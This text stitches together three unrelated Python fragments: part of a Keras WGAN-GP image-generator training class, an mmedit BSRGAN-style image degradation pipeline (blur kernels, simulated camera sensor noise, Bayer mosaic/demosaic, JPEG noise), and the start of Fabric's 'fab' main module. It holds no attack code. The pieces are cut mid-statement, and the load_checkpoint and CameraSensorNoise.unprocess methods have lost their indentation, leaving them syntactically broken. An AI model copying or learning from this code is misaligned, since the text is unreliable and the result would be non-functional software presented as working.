            gen_mod_name/critic_mod_name: template names looked up in the
                generator/discriminator model spreadsheets.
            latent_dim: size of the generator's noise input (> 0).
            training_progress_save_path: root folder for logs/noise/checkpoints.
            critic_gradient_penalty_weight: loss weight of the GP term.

        NOTE(review): the mutable RMSprop defaults are shared across instances;
        harmless for single use but worth confirming if multiple WGANGC objects
        are created.
        """
        self.critic_mod_name = critic_mod_name
        self.gen_mod_name = gen_mod_name
        self.latent_dim = latent_dim
        assert self.latent_dim > 0, Fore.RED + "Invalid latent dim" + Fore.RESET
        self.batch_size = batch_size
        assert self.batch_size > 0, Fore.RED + "Invalid batch size" + Fore.RESET
        # Grid (cols, rows) of the periodic progress image
        self.progress_image_dim = (16, 9)
        if start_episode < 0: start_episode = 0
        self.episode_counter = start_episode
        # Initialize training data folder and logging
        self.training_progress_save_path = training_progress_save_path
        self.training_progress_save_path = os.path.join(self.training_progress_save_path, f"{self.gen_mod_name}__{self.critic_mod_name}__{self.latent_dim}")
        self.tensorboard = TensorBoardCustom(log_dir=os.path.join(self.training_progress_save_path, "logs"))
        # Create array of input image paths
        self.train_data = get_paths_of_files_from_path(dataset_path, only_files=True)
        assert self.train_data, Fore.RED + "Training dataset is not loaded" + Fore.RESET
        # Load one image to get shape of it (cv.imread shape is (height, width, channels))
        tmp_image = cv.imread(self.train_data[0])
        self.image_shape = tmp_image.shape
        self.image_channels = self.image_shape[2]
        # Check image size validity
        if self.image_shape[0] < 4 or self.image_shape[1] < 4: raise Exception("Images too small, min size (4, 4)")
        # Check validity of datasets
        if check_dataset:
            self.validate_dataset()
        # Define static vars: a fixed noise batch reused for progress images,
        # persisted so restarts keep comparable outputs
        if os.path.exists(f"{self.training_progress_save_path}/static_noise.npy"):
            self.static_noise = np.load(f"{self.training_progress_save_path}/static_noise.npy")
            if self.static_noise.shape[0] != (self.progress_image_dim[0] * self.progress_image_dim[1]):
                print(Fore.YELLOW + "Progress image dim changed, restarting static noise!" + Fore.RESET)
                os.remove(f"{self.training_progress_save_path}/static_noise.npy")
                self.static_noise = np.random.normal(0.0, 1.0, size=(self.progress_image_dim[0] * self.progress_image_dim[1], self.latent_dim))
        else:
            self.static_noise = np.random.normal(0.0, 1.0, size=(self.progress_image_dim[0] * self.progress_image_dim[1], self.latent_dim))
        self.kernel_initializer = RandomNormal(stddev=0.02)
        # Build critic block
        self.critic = self.build_critic(critic_mod_name)
        # Build generator block
        self.generator = self.build_generator(gen_mod_name)
        if self.generator.output_shape[1:] != self.image_shape: raise Exception("Invalid image input size for this generator model")
        #################################
        ### Create combined generator ###
        #################################
        # Create model inputs
        gen_latent_input = Input(shape=(self.latent_dim,), name="combined_generator_latent_input")
        # Create frozen version of critic (trainable flags must be set before Model compile)
        self.critic.trainable = False
        for layer in self.critic.layers:
            layer.trainable = False
        # Generate images and evaluate them
        generated_images = self.generator(gen_latent_input)
        critic_gen_output = self.critic(generated_images)
        self.combined_generator_model = Model(inputs=[gen_latent_input],
                                              outputs=[critic_gen_output],
                                              name="combined_generator_model")
        self.combined_generator_model.compile(optimizer=generator_optimizer, loss=wasserstein_loss)
        ##############################
        ### Create combined critic ###
        ##############################
        # Create model inputs
        real_image_input = Input(shape=self.image_shape, name="combined_critic_real_image_input")
        critic_latent_input = Input(shape=(self.latent_dim,), name="combined_critic_latent_input")
        # Create frozen version of generator (critic unfrozen again for its own training)
        self.critic.trainable = True
        for layer in self.critic.layers:
            layer.trainable = True
        self.generator.trainable = False
        for layer in self.generator.layers:
            layer.trainable = False
        # Create fake image input (internal)
        generated_images_for_critic = self.generator(critic_latent_input)
        # Create critic output for each image "type"
        fake_out = self.critic(generated_images_for_critic)
        valid_out = self.critic(real_image_input)
        # Create weighted input to critic for gradient penalty loss
        averaged_samples = RandomWeightedAverage(self.batch_size)(inputs=[real_image_input, generated_images_for_critic])
        validity_interpolated = self.critic(averaged_samples)
        # Create partial gradient penalty loss function (__name__ required by Keras)
        partial_gp_loss = partial(gradient_penalty_loss, averaged_samples=averaged_samples)
        partial_gp_loss.__name__ = 'gradient_penalty'
        self.combined_critic_model = Model(inputs=[real_image_input, critic_latent_input],
                                           outputs=[valid_out,
                                                    fake_out,
                                                    validity_interpolated],
                                           name="combined_critic_model")
        self.combined_critic_model.compile(optimizer=critic_optimizer,
                                           loss=[wasserstein_loss,
                                                 wasserstein_loss,
                                                 partial_gp_loss],
                                           loss_weights=[1, 1, critic_gradient_penalty_weight])
        # Summary of combined models
        print("\nGenerator Summary:")
        self.generator.summary()
        print("\nCritic Summary:")
        self.critic.summary()
        # Load checkpoint
        self.initiated = False
        if load_from_checkpoint: self.load_checkpoint()
        # Load weights and override checkpoint loaded weights
        if critic_weights: self.critic.load_weights(critic_weights)
        if generator_weights: self.generator.load_weights(generator_weights)
        # Create batchmaker and start it
        self.batch_maker = BatchMaker(self.train_data, self.batch_size, buffered_batches=buffered_batches, num_of_loading_workers=num_of_loading_workers)
        # Create some proprietary objects: WGAN label conventions
        # (fake=+1, real=-1, gradient-penalty target=0)
        self.fake_labels = np.ones((self.batch_size, 1), dtype=np.float32)
        self.valid_labels = -np.ones((self.batch_size, 1), dtype=np.float32)
        self.gradient_labels = np.zeros((self.batch_size, 1), dtype=np.float32)
# Check if datasets have consistent shapes
def validate_dataset(self):
    """Verify every training image matches self.image_shape in height and width.

    Raises Exception if any image's dimensions (read via imagesize, without
    decoding the full file) disagree with the configured shape.
    """
    def _image_ok(image_path):
        dims = imagesize.get(image_path)
        return dims[0] == self.image_shape[0] and dims[1] == self.image_shape[1]

    print(Fore.BLUE + "Checking dataset validity" + Fore.RESET)
    with ThreadPool(processes=8) as pool:
        results = pool.map(_image_ok, self.train_data)
    if not all(results):
        raise Exception("Inconsistent training dataset")
    print(Fore.BLUE + "Dataset valid" + Fore.RESET)
# Create generator based on template selected by name
def build_generator(self, model_name:str):
    """Build the generator Model from a template function in generator_models_spreadsheet.

    The template named `model_name` maps the latent input to the image tensor.
    Raises Exception when no such template exists (or it fails to build).
    """
    latent_input = Input(shape=(self.latent_dim,))
    try:
        template = getattr(generator_models_spreadsheet, model_name)
        body = template(latent_input, self.image_shape, self.image_channels, self.kernel_initializer)
    except Exception as e:
        raise Exception(f"Generator model not found!\n{e}")
    return Model(latent_input, body, name="generator_model")
# Create critic based on teplate selected by name
def build_critic(self, model_name:str):
    """Build the critic Model from a template in discriminator_models_spreadsheet.

    A single linear (no activation) Dense unit is appended: the WGAN critic
    outputs an unbounded realness score, not a probability.
    """
    image_input = Input(shape=self.image_shape)
    try:
        template = getattr(discriminator_models_spreadsheet, model_name)
        features = template(image_input, self.kernel_initializer)
    except Exception as e:
        raise Exception(f"Critic model not found!\n{e}")
    # Linear output for critic
    score = Dense(1)(features)
    return Model(image_input, score, name="critic_model")
def train(self, target_episode:int,
          progress_images_save_interval:int=None, save_raw_progress_images:bool=True, weights_save_interval:int=None,
          critic_train_multip:int=5):
    """Run the WGAN-GP training loop up to episode `target_episode`.

    Args:
        target_episode: absolute episode index to stop at (not a delta);
            must exceed the episodes already recorded in self.episode_counter.
        progress_images_save_interval: save a progress image grid every N episodes (None = never).
        save_raw_progress_images: also write the raw PNG grid to disk when saving progress.
        weights_save_interval: save model weights every N episodes (None = never).
        critic_train_multip: critic updates per generator update (the usual WGAN-GP schedule).
    """
    # Check arguments and input data
    assert target_episode > 0, Fore.RED + "Invalid number of episodes" + Fore.RESET
    if progress_images_save_interval:
        assert progress_images_save_interval <= target_episode, Fore.RED + "Invalid progress save interval" + Fore.RESET
    if weights_save_interval:
        assert weights_save_interval <= target_episode, Fore.RED + "Invalid weights save interval" + Fore.RESET
    assert critic_train_multip >= 1, Fore.RED + "Invalid critic training multiplier" + Fore.RESET
    # Calculate epochs to go: from here on `target_episode` holds the REMAINING episode count
    end_episode = target_episode
    target_episode = target_episode - self.episode_counter
    assert target_episode > 0, Fore.CYAN + "Training is already finished" + Fore.RESET
    # Save noise for progress consistency (the same latent vectors are reused for every grid)
    if progress_images_save_interval is not None:
        if not os.path.exists(self.training_progress_save_path): os.makedirs(self.training_progress_save_path)
        np.save(f"{self.training_progress_save_path}/static_noise.npy", self.static_noise)
    # Rolling window of per-episode durations, used only for the ETA estimate below
    epochs_time_history = deque(maxlen=self.AGREGATE_STAT_INTERVAL * 50)
    # Save starting kernels and biases (first-ever run only)
    if not self.initiated:
        self.__save_imgs(save_raw_progress_images)
        self.save_checkpoint()
    print(Fore.GREEN + f"Starting training on episode {self.episode_counter} for {target_episode} episodes" + Fore.RESET)
    for _ in range(target_episode):
        ep_start = time.time()
        ### Train Critic ###
        # Several critic steps per generator step; losses are averaged for reporting
        critic_loss = 0
        for _ in range(critic_train_multip):
            # Load image batch and generate new latent noise
            image_batch = self.batch_maker.get_batch()
            critic_noise_batch = np.random.normal(0, 1, (self.batch_size, self.latent_dim))
            # Targets: valid (real), fake (generated), zeros for the gradient-penalty output
            critic_loss += float(self.combined_critic_model.train_on_batch([image_batch, critic_noise_batch], [self.valid_labels, self.fake_labels, self.gradient_labels])[0])
        critic_loss /= critic_train_multip
        ### Train Generator ###
        # Generate new latent noise; generator is optimized to get "valid" scores from the critic
        gen_loss = self.combined_generator_model.train_on_batch(np.random.normal(0.0, 1.0, (self.batch_size, self.latent_dim)), self.valid_labels)
        self.episode_counter += 1
        self.tensorboard.step = self.episode_counter
        self.tensorboard.update_stats(critic_loss=critic_loss, gen_loss=gen_loss)
        # Show stats
        if self.episode_counter % self.AGREGATE_STAT_INTERVAL == 0:
            # Save stats
            print(Fore.GREEN + f"{self.episode_counter}/{end_episode}, Remaining: {time_to_format(mean(epochs_time_history) * (end_episode - self.episode_counter))}\t\t[Critic loss: {round(float(critic_loss), 5)}] [Gen loss: {round(float(gen_loss), 5)}]" + Fore.RESET)
        # Save progress
        if self.training_progress_save_path is not None and progress_images_save_interval is not None and self.episode_counter % progress_images_save_interval == 0:
            self.__save_imgs(save_raw_progress_images)
        # Save weights of models
        if weights_save_interval is not None and self.episode_counter % weights_save_interval == 0:
            self.__save_weights()
        # Save checkpoint
        if self.episode_counter % self.CHECKPOINT_SAVE_INTERVAL == 0:
            self.save_checkpoint()
            print(Fore.BLUE + "Checkpoint created" + Fore.RESET)
        # Reset seeds so numpy's and python's RNG streams are re-seeded from the OS periodically
        if self.episode_counter % self.RESET_SEEDS_INTERVAL == 0:
            np.random.seed(None)
            random.seed()
        epochs_time_history.append(time.time() - ep_start)
    # Shutdown helper threads
    print(Fore.GREEN + "Training Complete - Waiting for other threads to finish" + Fore.RESET)
    self.batch_maker.terminate()
    self.save_checkpoint()
    self.__save_weights()
    self.batch_maker.join()
    print(Fore.GREEN + "All threads finished" + Fore.RESET)
# Function for saving progress images
def __save_imgs(self, save_raw_progress_images:bool=True):
    """Render a tiled grid of generator samples from the fixed static noise.

    The grid is progress_image_dim[0] columns by progress_image_dim[1] rows.
    The image is always logged to TensorBoard; the raw PNG is written to
    <training_progress_save_path>/progress_images/<episode>.png only when
    save_raw_progress_images is True.
    """
    if not os.path.exists(self.training_progress_save_path + "/progress_images"): os.makedirs(self.training_progress_save_path + "/progress_images")
    gen_imgs = self.generator.predict(self.static_noise)
    # Rescale images 0 to 255 (assumes generator output lies in [-1, 1] — TODO confirm)
    gen_imgs = (0.5 * gen_imgs + 0.5) * 255
    # Blank canvas sized rows*H by cols*W; filled cell by cell below
    final_image = np.zeros(shape=(self.image_shape[0] * self.progress_image_dim[1], self.image_shape[1] * self.progress_image_dim[0], self.image_channels)).astype(np.float32)
    cnt = 0
    for i in range(self.progress_image_dim[1]):
        for j in range(self.progress_image_dim[0]):
            if self.image_channels == 3:
                final_image[self.image_shape[0] * i:self.image_shape[0] * (i + 1), self.image_shape[1] * j:self.image_shape[1] * (j + 1), :] = gen_imgs[cnt]
            else:
                # Non-RGB case: copy only channel 0 into the single-channel canvas
                final_image[self.image_shape[0] * i:self.image_shape[0] * (i + 1), self.image_shape[1] * j:self.image_shape[1] * (j + 1), 0] = gen_imgs[cnt, :, :, 0]
            cnt += 1
    # Generated samples are treated as RGB; OpenCV writes BGR to disk
    # NOTE(review): cvtColor requires a 3-channel input — confirm image_channels == 3 on this path
    final_image = cv.cvtColor(final_image, cv.COLOR_RGB2BGR)
    if save_raw_progress_images:
        cv.imwrite(f"{self.training_progress_save_path}/progress_images/{self.episode_counter}.png", final_image)
    # TensorBoard expects RGB floats in [0, 1] with a leading batch axis
    self.tensorboard.write_image(np.reshape(cv.cvtColor(final_image, cv.COLOR_BGR2RGB) / 255, (-1, final_image.shape[0], final_image.shape[1], final_image.shape[2])).astype(np.float32))
def save_models_structure_images(self, save_path:str=None):
    """Render architecture diagrams (PNG) of all four models into `save_path`.

    Defaults to <training_progress_save_path>/model_structures when no path is given.
    """
    if save_path is None:
        save_path = self.training_progress_save_path + "/model_structures"
    if not os.path.exists(save_path):
        os.makedirs(save_path)
    targets = (
        (self.combined_generator_model, "combined_generator.png"),
        (self.combined_critic_model, "combined_critic.png"),
        (self.generator, "generator.png"),
        (self.critic, "critic.png"),
    )
    for model_obj, file_name in targets:
        plot_model(model_obj, os.path.join(save_path, file_name), expand_nested=True, show_shapes=True)
def load_checkpoint(self):
checkpoint_base_path = os.path.join(self.training_progress_save_path, "checkpoint")
if not os.path.exists(os.path.join(checkpoint_base_path, "checkpoint_data.json")): return
with open(os.path.join(checkpoint_base_path, "checkpoint_data.json"), "rb") as f:
data = json.load(f)
if data:
self.episode_counter = int(data["episode"])
try:
self.generator.load_weights(data["gen_path"])
except:
print(Fore.YELLOW + "Failed to load generator weights from checkpoint" + Fore.RESET)
try:
self.critic.load_weights(data["critic_path"])
except:
print(Fore.YELLOW + "Failed to load critic weights from checkpoint" + Fore.RESET)
self.initiated = | |
<filename>mmedit/datasets/pipelines/bsrgan_degradation.py
import warnings
warnings.filterwarnings('ignore')
import os
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import cv2
from scipy.interpolate import interp2d
from ..registry import PIPELINES
# blur
class BlurKernel2D(object):
    """Base class for 2-D blur augmentations on HWC numpy images.

    Subclasses implement `apply`; calling the instance validates the input
    (must be a 3-D ndarray) before delegating to `apply`.
    """

    def check_kernel(self):
        # NOTE(review): relies on self.ksize being set by a subclass — confirm
        if self.ksize[0] % 2 == 0 or self.ksize[1] % 2 == 0:
            raise ValueError(
                f'Expect kernel size to be odd (1, 3, 5, etc.), but got {self.ksize}')

    def check_input(self, x):
        # Accept only 3-D numpy arrays (H, W, C)
        if not isinstance(x, np.ndarray):
            return False
        return x.ndim == 3

    def __call__(self, im):
        if im is None:
            raise ValueError(f'Encounter None data in {type(self)}')
        if not self.check_input(im):
            raise ValueError(f'Expect input image to be 3D-array (HWC), but got {im.ndim}D-array. {type(self)}')
        return self.apply(im)

    def apply(self, im):
        raise NotImplementedError
class IsotropicGaussianBlur2D(BlurKernel2D):
    """Isotropic (circular) Gaussian blur with a square, odd-sized kernel."""

    def __init__(self, kernel_size, std):
        assert kernel_size % 2 == 1
        self.kernel_size = (kernel_size, kernel_size)
        self.std = std

    def apply(self, im):
        if not self.check_input(im):
            raise ValueError
        # Same sigma on both axes -> isotropic; reflected border avoids edge artifacts
        return cv2.GaussianBlur(im, self.kernel_size, self.std, self.std,
                                borderType=cv2.BORDER_REFLECT_101)
class AnisotropicGaussianBlur2D(BlurKernel2D):
    """Anisotropic Gaussian blur: elliptical kernel built from eigenvalues `var`
    rotated by `angle`, applied via 2-D correlation."""

    def __init__(self, kernel_size, var, angle, scale=1):
        assert kernel_size % 2 == 1
        size_vec = np.array([kernel_size, kernel_size])
        # Covariance matrix: diag(eigenvalues) rotated by `angle`
        lam1, lam2 = var
        eigvals = np.diag([lam1, lam2])
        rot = np.array([[np.cos(angle), -np.sin(angle)],
                        [np.sin(angle), np.cos(angle)]])
        cov = rot @ eigvals @ rot.T
        inv_cov = np.linalg.inv(cov)[None, None, :, :]
        # Shift the kernel centre so a downscaled image stays spatially aligned
        mu = size_vec // 2 - 0.5 * (scale - 1)
        mu = mu[None, None, :, None]
        # Evaluate the (unnormalised) Gaussian on every grid position of the kernel
        xs, ys = np.meshgrid(range(size_vec[0]), range(size_vec[1]))
        grid = np.stack([xs, ys], 2)[:, :, :, None]
        centred = grid - mu
        quad = centred.transpose(0, 1, 3, 2) @ inv_cov @ centred
        raw_kernel = np.exp(-0.5 * np.squeeze(quad))
        # Normalise to unit mass so overall brightness is preserved
        self.kernel = raw_kernel / np.sum(raw_kernel)

    def apply(self, im):
        # Depthwise correlation with the precomputed kernel (same depth as input)
        return cv2.filter2D(im, -1, self.kernel)
# camera_sensor_noise
# =================================================================================
# unprocess
def prepare_ccm():
    """Build a random RGB->camera color correction matrix.

    A weighted average of several per-device XYZ->camera matrices is composed
    with the standard RGB->XYZ matrix; rows are normalised so white maps to white.
    """
    device_matrices = np.array([
        [21492, -5753, -3253, 2306, 8110, -425, 7066, 1327, 2068],
        [9804, -2699, -1302, -5813, 13164, 3058, -2428, 3065, 8675],
        [6847, -614, -1114, -4669, 12737, 2139, -1197, 2487, 6846],
        [13510, -6199, -1244, -4430, 12736, 1865, -332, 1443, 5024],
        [11511, -4358, -1065, -6524, 13767, 3068, -1467, 1984, 6045],
        [7175, -1983, -658, -8075, 15555, 2718, -2171, 2502, 7457],
        [7713, -2059, -653, -3882, 11495, 2726, -710, 1332, 5958]
    ]) / 10000
    count = len(device_matrices)
    xyz2cams = device_matrices.reshape(-1, 3, 3)
    # Random convex-style combination of the device matrices
    weights = np.random.uniform(1e-8, 1e8, (count, 1, 1))
    xyz2cam = np.sum(xyz2cams * weights, axis=0) / np.sum(weights, axis=0)
    # Multiplies with RGB -> XYZ to get RGB -> Camera CCM.
    rgb2xyz = np.array([[0.4124564, 0.3575761, 0.1804375],
                        [0.2126729, 0.7151522, 0.0721750],
                        [0.0193339, 0.1191920, 0.9503041]])
    rgb2cam = np.matmul(xyz2cam, rgb2xyz)
    # Normalizes each row.
    return rgb2cam / np.sum(rgb2cam, axis=-1, keepdims=True)
def random_gains():
    """Generates random gains for brightening and white balance."""
    # Draw order matters for RNG-stream reproducibility: brightness, red, blue.
    brightness = np.random.uniform(2 ** (-0.1), 2 ** (0.3))
    wb_red = np.random.uniform(1.2, 2.4)
    wb_blue = np.random.uniform(1.2, 2.4)
    return brightness, wb_red, wb_blue
def gamma_expansion(image):
    """Converts from gamma-encoded to linear space (gamma 2.2)."""
    # Flooring at 1e-8 prevents numerical instability of gradients near zero
    floored = np.maximum(image, 1e-8)
    return floored ** 2.2
def apply_ccm(image, ccm):
    """Applies a 3x3 color correction matrix to an HWC image (rows of ccm are output channels)."""
    original_shape = image.shape
    flat = image.reshape(-1, 3)
    # out[p, k] = sum_l flat[p, l] * ccm[k, l]
    corrected = np.tensordot(flat, ccm, axes=[[-1], [-1]])
    return corrected.reshape(original_shape)
def safe_invert_gains(image, rgb_gain, red_gain, blue_gain):
    """Inverts white-balance/brightness gains while protecting near-saturated pixels."""
    inverse = np.stack([1.0 / red_gain, 1.0, 1.0 / blue_gain]) / rgb_gain
    inverse = inverse.reshape(1, 1, 3)
    # Smoothly mask the gains towards 1.0 as pixels approach white so
    # saturated regions are not dimmed.
    luma = np.mean(image, axis=-1, keepdims=True)
    inflection = 0.9
    mask = (np.maximum(luma - inflection, 0.0) / (1.0 - inflection)) ** 2.0
    safe = np.maximum(mask + (1.0 - mask) * inverse, inverse)
    return image * safe
def mosaic(image):
    """Extracts RGGB Bayer planes from an RGB image.

    Args:
        image: HxWx3 array with even H and W.
    Returns:
        (H//2, W//2, 4) array whose last axis is [R, G_r, G_b, B].

    Note: the four slice expressions below restore the canonical RGGB layout —
    the previous source text was corrupted (slice indices replaced by scrubbed
    placeholder strings).
    """
    shape = image.shape
    # RGGB cell: R at (even row, even col), G_r at (even, odd),
    # G_b at (odd, even), B at (odd, odd).
    red = image[0::2, 0::2, 0]
    green_red = image[0::2, 1::2, 1]
    green_blue = image[1::2, 0::2, 1]
    blue = image[1::2, 1::2, 2]
    image = np.stack((red, green_red, green_blue, blue), axis=-1)
    image = np.reshape(image, (shape[0] // 2, shape[1] // 2, 4))
    return image
def random_noise_levels():
    """Generates random (shot, read) noise levels from a log-log linear model."""
    # Shot noise is sampled log-uniformly; draw order (uniform, then normal)
    # is preserved for RNG-stream reproducibility.
    log_shot = np.random.uniform(np.log(0.0001), np.log(0.005))
    # Read noise follows a linear fit in log-log space plus Gaussian jitter
    log_read = 2.18 * log_shot + 1.20 + 0.26 * np.random.normal()
    return np.exp(log_shot), np.exp(log_read)
def add_noise(image, shot_noise=0.01, read_noise=0.0005):
    """Adds signal-dependent shot noise plus constant read noise to `image`."""
    # Per-pixel variance: shot term scales with intensity, read term is flat
    variance = image * shot_noise + read_noise
    gauss = np.random.randn(*image.shape)
    return image + np.sqrt(variance) * gauss
# =================================================================================
# process
def apply_gains(bayer_images, red_gains, blue_gains):
    """Applies white-balance gains to RGGB planes (last axis = R, G_r, G_b, B)."""
    unity = np.ones_like(red_gains)
    # Green planes keep gain 1; only red/blue are rebalanced
    per_plane = np.stack([red_gains, unity, unity, blue_gains], axis=-1)
    per_plane = per_plane[np.newaxis, np.newaxis, :]
    return bayer_images * per_plane
def pixels_organize(im, scale):
    """Space-to-depth: fold each scale x scale spatial block into the channel axis."""
    h, w, c = im.shape
    blocks = im.reshape(h // scale, scale, w // scale, scale, c)
    # Bring the two block axes next to the channel axis, then flatten them into it
    blocks = blocks.transpose(0, 2, 1, 3, 4)
    return blocks.reshape(h // scale, w // scale, -1)
def invert_pixels_organize(im, scale):
    """Depth-to-space: inverse of pixels_organize, unfolding channels back into scale x scale blocks."""
    h, w, c = im.shape
    depth = c // (scale ** 2)
    unfolded = im.reshape(h, w, scale, scale, depth)
    # Interleave the block axes back between the spatial axes
    unfolded = unfolded.transpose(0, 2, 1, 3, 4)
    return unfolded.reshape(h * scale, w * scale, -1)
def demosaic(bayer_images):
    """Demosaics an RGGB mosaic (H/2 x W/2 x 4 planes: R, G_r, G_b, B) to H x W x 3 RGB.

    Each plane is upsampled to full resolution with cv2.resize; the
    fliplr/flipud round-trips shift the interpolation phase so each plane is
    resampled relative to its own offset within the Bayer cell. Green is
    reassembled from the two green planes via space-to-depth bookkeeping
    (pixels_organize / invert_pixels_organize).
    """
    shape = bayer_images.shape
    # cv2.resize takes (width, height) — hence the swapped order
    shape = (shape[1] * 2, shape[0] * 2)
    red = bayer_images[Ellipsis, 0:1]
    red = cv2.resize(red, shape)
    green_red = bayer_images[Ellipsis, 1:2]
    # Horizontal flip before/after resizing: aligns interpolation to the G_r sites
    green_red = np.fliplr(green_red)
    green_red = cv2.resize(green_red, shape)
    green_red = np.fliplr(green_red)
    green_red = pixels_organize(green_red[Ellipsis, None], 2)
    green_blue = bayer_images[Ellipsis, 2:3]
    # Vertical flip: same trick for the G_b sites
    green_blue = np.flipud(green_blue)
    green_blue = cv2.resize(green_blue, shape)
    green_blue = np.flipud(green_blue)
    green_blue = pixels_organize(green_blue[Ellipsis, None], 2)
    # After pixels_organize each 2x2 block is channels 0..3:
    # 0=top-left (R site), 1=top-right (G_r site), 2=bottom-left (G_b site), 3=bottom-right (B site).
    # Average the two green estimates at the R and B sites.
    green_at_red = (green_red[Ellipsis, 0] + green_blue[Ellipsis, 0]) / 2
    green_at_green_red = green_red[Ellipsis, 1]
    green_at_green_blue = green_blue[Ellipsis, 2]
    green_at_blue = (green_red[Ellipsis, 3] + green_blue[Ellipsis, 3]) / 2
    green_planes = [
        green_at_red, green_at_green_red, green_at_green_blue, green_at_blue
    ]
    green = invert_pixels_organize(np.stack(green_planes, axis=-1), 2)
    blue = bayer_images[Ellipsis, 3:4]
    # Both flips: B sits diagonally opposite R in the 2x2 Bayer cell
    blue = np.flipud(np.fliplr(blue))
    blue = cv2.resize(blue, shape)
    blue = np.flipud(np.fliplr(blue))
    rgb_images = np.concatenate(
        [red[Ellipsis, None], green, blue[Ellipsis, None]], axis=-1)
    return rgb_images
def apply_ccms(images, ccms):
    """Applies a 3x3 color correction matrix to every pixel of an HWC image."""
    # Broadcast pixel vectors against matrix rows, then contract over input channels
    expanded = images[:, :, np.newaxis, :]
    matrices = ccms[np.newaxis, np.newaxis, :, :]
    return np.sum(expanded * matrices, axis=-1)
def gamma_compression(images, gamma=2.2):
    """Converts from linear to gamma space."""
    # Clamp avoids the infinite gradient of x ** (1/gamma) at zero
    clamped = np.maximum(images, 1e-8)
    return clamped ** (1.0 / gamma)
# noise
class NoiseAugmentation(object):
    """Base class for noise augmentations on HWC numpy images.

    Subclasses implement `apply` on float images; uint8 inputs are scaled to
    [0, 1] on the way in and back to uint8 on the way out, unless the subclass
    sets `requires_normalize` to False.
    """

    def __init__(self, **kwargs):
        self.requires_normalize = True

    def check_input(self, x):
        # Accept only 3-D numpy arrays (H, W, C)
        if not isinstance(x, np.ndarray):
            return False
        return x.ndim == 3

    def __call__(self, im):
        if im is None:
            raise ValueError(f'Encounter None in {type(self)}')
        if not self.check_input(im):
            raise ValueError(
                f'Expect input image to be 3D-array, but got {im.ndim}D-array. {type(self)}')
        needs_scaling = (im.dtype == np.uint8) and self.requires_normalize
        if needs_scaling:
            im = im.astype(np.float32) / 255.
        im = self.apply(im)
        if needs_scaling:
            im = (im * 255).astype(np.uint8)
        return im

    def apply(self, clean_data):
        raise NotImplementedError
class MultivarGaussianNoise(NoiseAugmentation):
    """Adds channel-correlated Gaussian noise (covariance `cor_var`); clips to [0, 1]."""

    def __init__(self, mean=0., cor_var=None):
        super(MultivarGaussianNoise, self).__init__()
        assert cor_var is not None
        # Same mean for all three channels
        self.mean = np.array([mean] * 3)
        self.cor_var = np.array(cor_var)

    def apply(self, clean_data):
        # One 3-vector noise sample per pixel, correlated across channels
        noise = np.random.multivariate_normal(
            self.mean, self.cor_var, size=clean_data.shape[:-1])
        return np.clip(clean_data + noise, 0., 1.)
class ChannelIndependentGaussianNoise(NoiseAugmentation):
    """Adds i.i.d. Gaussian noise per element; clips the result to [0, 1]."""

    def __init__(self, mean=0., std=0.01):
        super(ChannelIndependentGaussianNoise, self).__init__()
        self.mean = mean
        self.std = std

    def apply(self, clean_data):
        noise = np.random.randn(*clean_data.shape) * self.std + self.mean
        return np.clip(clean_data + noise, 0., 1.)
class GrayscaleGaussianNoise(NoiseAugmentation):
    """Adds one Gaussian noise field shared by all channels (broadcast over C); clips to [0, 1]."""

    def __init__(self, mean=0., std=0.01):
        super(GrayscaleGaussianNoise, self).__init__()
        self.mean = mean
        self.std = std

    def apply(self, clean_data):
        # Single-channel noise, broadcast across the channel axis on addition
        noise_shape = clean_data.shape[:-1] + (1,)
        noise = self.std * np.random.randn(*noise_shape) + self.mean
        return np.clip(clean_data + noise, 0., 1.)
class JPEGCompressionNoise(NoiseAugmentation):
    """Round-trips the image through in-memory JPEG encode/decode at a fixed quality."""

    def __init__(self, quality):
        super(JPEGCompressionNoise, self).__init__()
        self.quality = quality
        # The JPEG codec consumes uint8 directly; skip the [0, 1] normalization
        self.requires_normalize = False

    def apply(self, clean_data):
        params = (int(cv2.IMWRITE_JPEG_QUALITY), self.quality)
        _, encoded = cv2.imencode('.jpg', clean_data, params)
        return cv2.imdecode(encoded, cv2.IMREAD_COLOR)
class CameraSensorNoise(NoiseAugmentation):
def unprocess(self, im):
rgb2cam = prepare_ccm()
cam2rgb = np.linalg.inv(rgb2cam)
rgb_gain, red_gain, blue_gain = random_gains()
# Inverts gamma compression.
image = gamma_expansion(im)
# Inverts color correction.
image = apply_ccm(image, rgb2cam)
# Approximately inverts white balance and brightening.
image = safe_invert_gains(image, rgb_gain, red_gain, blue_gain)
image = np.clip(image, 0.0, 1.0)
# Applies a Bayer mosaic.
image = mosaic(image)
metadata = {
'cam2rgb': cam2rgb,
'rgb_gain': rgb_gain,
'red_gain': red_gain,
'blue_gain': blue_gain,
}
| |
<gh_stars>0
"""
This module contains Fab's `main` method plus related subroutines.
`main` is executed as the command line ``fab`` program and takes care of
parsing options and commands, loading the user settings file, loading a
fabfile, and executing the commands given.
The other callables defined in this module are internal only. Anything useful
to individuals leveraging Fabric as a library, should be kept elsewhere.
"""
from operator import add
from optparse import OptionParser
import os
import sys
from fabric import api # For checking callables against the API
from fabric.contrib import console, files, project # Ditto
from fabric.network import denormalize, interpret_host_string, disconnect_all
from fabric import state # For easily-mockable access to roles, env and etc
from fabric.state import commands, connections, env_options
from fabric.utils import abort, indent
# One-time calculation of "all internal callables" to avoid doing this on every
# check of a given fabfile callable (in is_task()).
_modules = [api, project, files, console]
_internals = reduce(lambda x, y: x + filter(callable, vars(y).values()),
_modules,
[]
)
def load_settings(path):
    """
    Take given file path and return dictionary of any key=value pairs found.

    Usage docs are in docs/usage/fab.rst, in "Settings files."

    Fixes: the settings file was opened without ever being closed (handle
    leak); the py2-only list-returning ``filter`` idiom is replaced with a
    comprehension that works on both Python 2 and 3.
    """
    if os.path.exists(path):
        # Keep lines that are non-empty and not comments. Kept lines still
        # carry their trailing newline; strip() below removes it.
        with open(path, 'r') as fobj:
            settings = [line for line in fobj
                        if line and not line.startswith("#")]
        # 'key = value' -> ('key', 'value'); a line without '=' maps to ('line', '')
        return dict((k.strip(), v.strip()) for k, _, v in
                    [s.partition('=') for s in settings])
    # Handle nonexistent or empty settings file
    return {}
def _is_package(path):
"""
Is the given path a Python package?
"""
return (
os.path.isdir(path)
and os.path.exists(os.path.join(path, '__init__.py'))
)
def find_fabfile():
    """
    Attempt to locate a fabfile, either explicitly or by searching parent dirs.

    Usage docs are in docs/usage/fabfiles.rst, in "Fabfile discovery."
    Returns the absolute path of the fabfile, or None when nothing is found.
    """
    # Candidate names: the configured fabfile, plus a '.py' variant if needed
    names = [state.env.fabfile]
    if not names[0].endswith('.py'):
        names.append(names[0] + '.py')
